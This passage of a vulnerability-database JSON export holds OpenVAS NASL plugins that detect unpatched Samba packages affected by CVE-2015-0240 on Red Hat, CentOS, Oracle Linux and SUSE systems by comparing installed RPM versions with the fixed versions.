script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for samba RHSA-2015:0251-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the referenced Knowledgebase article.\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0251-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-February/msg00031.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1346913\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~14.el6_6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0251", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123182", "title": "Oracle Linux Local Check: ELSA-2015-0251", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0251.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123182\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0251\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0251 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0251\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0251.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-glusterfs\", rpm:\"samba-glusterfs~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "description": "Check the version of libsmbclient", "modified": "2019-03-11T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310882119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882119", "title": "CentOS Update for libsmbclient CESA-2015:0251 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2015:0251 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882119\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 05:42:37 +0100 (Wed, 25 Feb 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for libsmbclient CESA-2015:0251 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of libsmbclient\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nlinked at the references.\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0251\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-February/020943.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1346913\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-glusterfs\", rpm:\"samba-glusterfs~3.6.23~14.el6_6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:32", "bulletinFamily": "scanner", "description": "Check the version of samba4", "modified": "2019-03-11T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310882123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882123", "title": "CentOS Update for samba4 CESA-2015:0250 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2015:0250 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882123\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 05:42:49 +0100 (Wed, 25 Feb 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for samba4 CESA-2015:0250 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of samba4\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nlinked at the references.\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"samba4 on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0250\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-February/020944.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1346913\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~66.el6_6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0250", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123181", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123181", "title": "Oracle Linux Local Check: ELSA-2015-0250", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0250.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123181\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:23 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0250\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0250 - samba4 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0250\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0250.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~66.el6_6.rc4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850777", "title": "SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0371_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 